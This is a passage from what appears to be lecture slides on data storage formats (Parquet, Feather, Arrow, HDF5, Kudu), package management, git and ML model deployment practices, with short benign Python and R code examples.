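    "spend":  [1.0, 2.5, 0.5],
}

# Aggregating one column reads every record in the row store...
total_row = sum(r["clicks"] for r in row_store)

# ...but only one contiguous, single-typed list in the column store,
# which is also why per-column compression works so well.
total_col = sum(col_store["clicks"])

print(total_row, total_col)  # → 10 10
```

Same answer either way; the difference is how much unrelated data each layout forces the scan to touch.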
68
SQLite files
Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large
69
HDF5
HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex
70
Kudu
Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes
71
Apache Arrow
Engineers from across the Apache Hadoop community established Arrow as a de-facto standard for columnar in-memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
72
Feather
A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames. It has a few specific design goals:
Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance
“One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model” In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that could be used by both languages. Thus, the Feather format was born
73
Feather
library(feather)
path <- "my_data.feather"
write_feather(df, path)
df <- read_feather(path)

# Analogously, in Python, we have:
import feather
path = 'my_data.feather'
feather.write_dataframe(df, path)
df = feather.read_dataframe(path)
74
What to take away from this?
Be prepared to deal with different data sources
Avro is fast to serialize (write, dump) data and supports schema evolution: a great choice for ETL and integration
Parquet and Feather are fast to read, query, and analyse data
Feather is currently a popular choice for data science
Future: Arrow/Feather + Parquet
Feather is not designed for long-term data storage; at this time, there is no guarantee that the file format will be stable between versions
Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis
Feather is extremely fast; since it does not currently use any compression internally, it works best with solid-state drives, such as those found in most of today's laptop computers
Many organisations are adopting a hybrid approach
75
A Word on Packaging and Versioning Systems
76
Packaging
You’ll commonly encounter “package managers” when working in your preferred ecosystem
Management of installs and updates Avoiding conflicts Resolving dependencies
A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs for a computer’s operating system in a consistent manner.
77
Virtual environments
This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection of packages
The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome
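As an aside, Python's standard library ships a venv module that can create such an isolated environment programmatically; a stdlib-only sketch (the directory name is arbitrary):

```python
# Sketch: creating an isolated Python environment with the stdlib venv module
import os
import tempfile
import venv

env_dir = os.path.join(tempfile.mkdtemp(), "project-env")
venv.create(env_dir, with_pip=False)  # with_pip=True also bootstraps pip

# The environment gets its own interpreter and configuration:
print(os.listdir(env_dir))  # contains pyvenv.cfg, bin/ (Scripts/ on Windows)
```

On the command line, the equivalent is `python -m venv project-env`, after which activating the environment makes `pip install` operate inside it only.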
78
In Python and R
R comes with its own package management system, which allows you to download packages from a repository
E.g. install.packages(...) Virtual environments can be set up using packrat
Python has had a lot of package managers, but the most common one nowadays is pip
Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy Virtual environments can be set up using virtualenv
Or you can use conda: Anaconda’s package manager and virtual environment manager in one
Includes more than just Python packages: R and other tools are included as well
Hence it also allows you to set up clean, isolated R workspaces
Good rule of thumb: a new conda environment for each project
https://conda.io/projects/conda/en/latest/user-guide/getting-started.html
https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf
To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well
79
Versioning systems
Something else to read up on is the use of version control systems
Even a good idea to use this for a “team of one”
SVN, CVS, Mercurial, Bazaar
The most common one is git, however
Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing disruption to all team members.
80
git
GitHub: hosts git repositories for you (free) GitLab: an alternative
Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development. As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server. Git is free and open-source software distributed under the terms of the GNU General Public License version 2.
81
git
GitHub Desktop
82
git
A good way to practice is to put your coding and data science projects, even your blog, on GitHub
E.g. feel free to try this for Assignment 2
Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked on and collaborated on
83
Model Deployment
84
Context
Recall from the evaluation session that evaluation doesn’t stop at deployment
Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511)
In real-world machine learning systems, only a small fraction consists of actual ML code
There is a vast array of surrounding infrastructure and processes to support their evolution
Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world
85
Context
A simple straight-through process?
86
Common deployment issues
Lineage of data dependencies
Metadata management
Ensuring that data is available to the model at prediction time
This includes all pre-processing steps that are applied to the data!
Different data sources, one-off data sources used during training
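One common way to keep training-time pre-processing in sync with prediction-time pre-processing is to bundle both into a single artifact; a minimal illustration, assuming scikit-learn:

```python
# Sketch: pre-processing and model bundled into one deployable pipeline
import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression

pipe = Pipeline([
    ("scale", StandardScaler()),      # fitted on training data only
    ("model", LogisticRegression()),
])

X_train = np.array([[0.0], [1.0], [2.0], [3.0]])
y_train = np.array([0, 0, 1, 1])
pipe.fit(X_train, y_train)

# At prediction time, new data automatically passes through the same,
# training-time-fitted scaling before reaching the model:
preds = pipe.predict(X_train)
```

Deploying the fitted pipeline as one object removes the risk of the production system re-implementing (and subtly diverging from) the training-time transformations.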
87
Common deployment issues
Deployment context
Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?
88
Common deployment issues
Development governance
Is the training code well-documented? How is collaboration, versioning handled? Can the training code be easily reproduced, e.g. to re-train the model periodically? “Runs on my machine phenomenon”
89
Common deployment issues
Model governance
How is the model deployed? A common platform, using containerization or virtualization, ad-hoc? Is versioning support provided for models? Models as data: can the output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated)?
90
Common deployment issues
Monitoring
Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?
91
Common deployment issues
Many of these issues are well known in traditional software engineering
Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)
In the context of ML productionization, many of these are hard to apply
ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models-degrade-in-production-d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline-understanding-model-degradation-machine-learning-models, https://mlinproduction.com/model-retraining/)
Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…)
Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time
A solid model governance infrastructure is key!
92
Deployment platforms
Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner Flow, Spotify’s Luigi, Netflix’s ML platform, Airbnb’s Bighead
93
Deployment principles
(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns
94
(Meta)Data management
The issue: during model development, data sources are typically dispersed and entangled, and it is hard to keep track of the data used during a model’s construction. Definitions are not clear or are unavailable
A common source of data should be set up and used both during model development and in production
Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines
Don’t split up the data layer into “raw”, “processed” and “final” stages: data is always raw and never final; focus instead on integrating the different sources in a common platform
When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer
Consider for every data input whether the data will be available at prediction time in a timely manner
Set up a structured data dictionary containing data definitions and metadata information, including data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements from being used if not permitted
Both data and metadata come with versioning: keep historical records available, i.e. you should be able to retrieve the state of the data as it was during training. This applies to streaming data as well: it is typically retained in a historical repository to be used when (re)training or using models
Make sure that predictions of models are ingested in the data layer if they are to be used as an input for other models
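What a single data dictionary entry might look like, as a hypothetical sketch (the field names and values are illustrative, not a standard):

```python
# Sketch: one (hypothetical) data dictionary entry for a model input
customer_age = {
    "name": "customer_age",
    "definition": "Age in whole years at the prediction timestamp",
    "source": "crm.customers",                    # location in the common data layer
    "available_at_prediction_time": True,         # checked before model use
    "purpose_constraints": ["no-marketing-use"],  # e.g. GDPR-driven restriction
    "version": 3,                                 # definitions are versioned too
}
```

Storing such entries centrally lets a deployment platform refuse a model that uses a field outside its allowed purposes, or one whose definition has changed since training.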
95
Train-run integration: reproducibility and testing
The issue: it is hard to re-train an outdated model, code used during development is in a separate environment and of lower quality than the code that gets deployed in the production environment
Aim for a reproducible pipeline: the resulting artifact of the training code should be directly deployable in production
Keep track of each “build” of the model to allow for versioning
This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream, e.g. using Kafka, Apache Pulsar, or Spark Streams)
After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions; report errors while building and running the model
Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, TensorFlow…), but allow for flexibility (e.g. using Python libraries) within a well-defined context
Isolate the runtime environment per model
Allow an updated model to “run silently” alongside the current version, so you’re free to test the model for a while and analyze its results (“canary” or “shadow” deployment)
Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end users and integrators
The same goes for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables available
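Tracking each “build” can be as simple as writing a metadata record next to the serialized artifact; a hypothetical sketch (the model name, fields, and values are illustrative):

```python
# Sketch: versioned build metadata stored alongside a model artifact
import json
import os
import tempfile
from datetime import datetime, timezone

metadata = {
    "model": "churn-classifier",                  # hypothetical model name
    "version": "v2",                              # matches e.g. /mymodel/v2/
    "trained_at": datetime.now(timezone.utc).isoformat(),
    "train_data_snapshot": "customers_2024_01",   # versioned data table used
    "test_auc": 0.83,                             # score on the standard test set
}

path = os.path.join(tempfile.mkdtemp(), "churn-classifier-v2.json")
with open(path, "w") as f:
    json.dump(metadata, f, indent=2)
# The serialized model itself (e.g. via joblib.dump) would sit next to
# this file, and the "/mymodel/v2/" endpoint would serve exactly this build.
```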
96
Monitoring, logging and alerting
The issue: models fail silently, their accuracy decreases over time, and changing data definitions might lead to models that use those data elements suddenly failing
See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML test score? A rubric for ML production systems
Set up a common monitoring and logging platform
Keep track of inputs provided to the model
Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve?
Keep track of model outputs as well over time
Does the probability distribution of the model’s output change over time? Does usage decrease? Do predictions fail? How long does it take to call the model? Repeated backtesting and control experiments are even better, but harder
97
Runtime patterns
The issue: where do models run? How will they be exposed in the organization?
Two common patterns:
Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being saved to the data layer, e.g. to Hadoop, an FTP server, a relational database table, or an Excel file
Pull: the model is deployed as an API or microservice to be queried by outside consumers, e.g. web apps, mobile apps, BI dashboards, reports…
In both cases, an isolated runtime environment needs to be provided!
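The "pull" pattern can be sketched with only the standard library: a JSON-over-HTTP endpoint serving one versioned model. The scoring function, route, and port are hypothetical placeholders, standing in for a real trained model behind a production-grade server.

```python
# Sketch: the "pull" pattern, a model behind a versioned HTTP endpoint
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

def score(features):
    # Placeholder for a trained model: a fixed linear score
    return 0.3 * features["x1"] + 0.7 * features["x2"]

class ModelHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Semantic versioning in the route, as discussed above
        if self.path != "/mymodel/v1/predict":
            self.send_error(404)
            return
        length = int(self.headers["Content-Length"])
        features = json.loads(self.rfile.read(length))
        body = json.dumps({"prediction": score(features)}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # in production, route this to the logging platform instead

# To serve: HTTPServer(("", 8000), ModelHandler).serve_forever()
```

In practice a framework (Flask, FastAPI…) and a proper application server would take this role, but the shape is the same: one isolated environment, one versioned route per model build.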
98
Runtime patterns
Isolated runtime environments
Each deployed version of a model comes with its own environment
E.g. Python version, packages used and their versions, other supporting executables and libraries
Different levels of isolation are possible
Environment isolation: e.g. Python virtual environments or Anaconda environments (each model runs in its own Anaconda environment)
Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (each model runs in its own Docker container on top of a shared OS layer)
Virtualization: the full OS stack is isolated on top of a hardware emulation layer
Serverless: models are deployed using e.g. AWS Lambda, Azure Functions, Google Cloud Functions; typically combined with data layers in the cloud as well
Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting
99
Closing
Trade-off between flexibility and robustness: allowing experimentation for ad-hoc or new projects is still fine
Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks
Not all models end as an API
In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?